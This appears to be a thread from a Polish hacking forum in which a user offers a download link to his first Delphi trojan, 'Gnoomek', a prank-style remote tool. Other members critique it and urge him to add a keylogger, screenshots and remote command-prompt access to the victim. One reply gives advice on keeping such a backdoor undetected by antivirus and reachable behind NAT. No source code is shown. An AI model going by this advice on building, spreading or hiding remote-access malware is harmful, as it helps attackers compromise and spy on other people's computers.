Gnoomek v0.1

[3rRoR]

Witam, niedawno rozpocząłem zabawę z Delphi, moim ostatnim dziełem jest Trojan "Gnoomek". Stworzyłem go jedynie byście mogli mi powiedzieć co mógłbym poprawić, dodać, jakie są błędy. Nie jest wypuszczony do użytku a do testów.

Dotychczasowe Funkcje:

-Wysuń CD
-Wsuń CD
-Zmień klawisze myszki
-Przywróć klawisze
-Wstaw mysz w klatkę

Proszę, nie bądźcie dla mnie srodzy ponieważ to mój pierwszy trojan.

UWAGA! PROGRAM STWORZONY JEDYNIE DO CELÓW EDUKACYJNYCH!

Download

http://www.speedyshare.com/344778598.html

Zdjęcie

http://www.imageshock.eu/?img=2472304,gnoomek.jpg

Pozdrawiam 3rRoR

 

[Kopaczka92]

Heh takich trojanów jest pełno i żadna sztuka zrobić jakiegoś trojana w LAN-ie

Zrób poza LAN-em

I przydały by się zabawy z monitorem reset kompa fajny bajerek to komunikaty

Dorzuć chociaż funkcji

k:

 

[greg007]

każdy trojan bez opcji keyloggera jest prosto zrobić. dorzuć zrzuty ekranu i keyloggera a wtedy możesz się pochwalić że znasz Delphi.

 

[Dark Smark]

Każdy trojan bez dostępu do konsoli/terminalu (cmd) nie jest trojanem.

 

[3rRoR]

Witam, dziękuję za wszystkie komentarze a szczególnie dziękuję za wypowiedź Dark Smark'owi ponieważ podsunął mi wspaniały pomysł, Gnoomek v0.2 będzie jak posiadał najprawdopodobniej tylko możliwość wpisywania komend do cmd ofiary

Przepraszam mogłem to napisać trochę dziwnie/nie zrozumiale ale w tej chwili mam 1000 myśli na sekundę.

Jeszcze raz wszystkim dziękuję i pozdrawiam!

3rRoR

 

[Reptile ReX]

Hmm ja jak zwykle ocenię Projekt skrupulatnie wyciągając najmniejsze niedociągnięcia

+/-

+Funkcje Działają ;p
+Łatwy w obsłudze
+Nie wykrywa go mój AV

+Spoko Ikonka

-Zero Grafiki
-Nieładne i nierówne Buttony
-Mało funkcji
-Formę można rozciągać i rozciągać
-Niechlujne rozmieszczenie
-Działa tylko z zew. IP (client i server socket ?)

Trojan Nie jest zły, ale estetyka ;(

Weźmy sobie Takie Gadu Gadu czy ktokolwiek uzywał by go gdyby wyglądało podobnie do twojego trojana ?

Ogólna Ocena: 5/10 Peace

 

[Dark Smark]

Originally posted by 3rRoR
Posty: 4

Dopisz komentarz do postu Wysłany: Wczoraj 15:33 Gnoomek v0.1
Witam, dziękuję za wszystkie komentarze a szczególnie dziękuję za wypowiedź Dark Smark'owi ponieważ podsunął mi wspaniały pomysł, Gnoomek v0.2 będzie jak posiadał najprawdopodobniej tylko możliwość wpisywania komend do cmd ofiary

Nie ma za co, po prostu po co pisać zbędne funkcje które mogą zwiększyć wykrywalność (takie jak WinApi wysuwanie CD) skoro inicjując wiersz poleceń uzyskamy spore możliwości. Moją sugestią by ułatwić korzystania z wiersza poleceń kompletnym "zielonym ludzią" => :whoeva:
to zrób "polonizacje" wiersza poleceń. Po prostu by zamiast

copy [ŚCIEŻKA PLIKU DO SKOPIOWANIA] [ŚCIEŻKA PLIKU DOCELOWEGO]

zrób

kopiuj [ŚCIEŻKA PLIKU DO SKOPIOWANIA] [ŚCIEŻKA PLIKU DOCELOWEGO]

Domyślam się bez ściągania w czym napisałeś tego backdoora to przeczytaj artykuł małego3900 o dwu członowych wiadomościach :
http://hms.ovh.org/art.wiadomosc.html

Najlepiej spisz na kartce sobie czego oczekują ludzie od tego programu:
[+] Wybierz protokół w którym nie będzie problemu łączenia sie za NAT [może być gg]
[+] Wybierz funkcje naprawdę potrzebne userą (które nie zwiększają wykrywalności)
Nie bój się usuwać funkcji które nieco zwiększają wykrywalność a nie są do życia niezbędne.
[+] Testuj, testuj testuj - gdy chcesz w programie napisać funkcję np: kopiowania plików to porównaj różne rozwiązania (kopiowanie przez cmd / kopiowanie wbudowane w język), sprawdz czy któreś z nich nie zwiększa wykrywalności.
[+] Staraj się nie używać komponentów które zwiększają wykrywalność, lepiej zajrzeć do źródła komponentu i poucinać niepotrzebne rzeczy.

 

[erni666]

program zarypisty w naszej sieci w bloku tak straszylem kumpli

7/10

 

[Kanciastoporty]

http://www.haker.com.pl/viewtopic.php?p=21...ghlight=#219995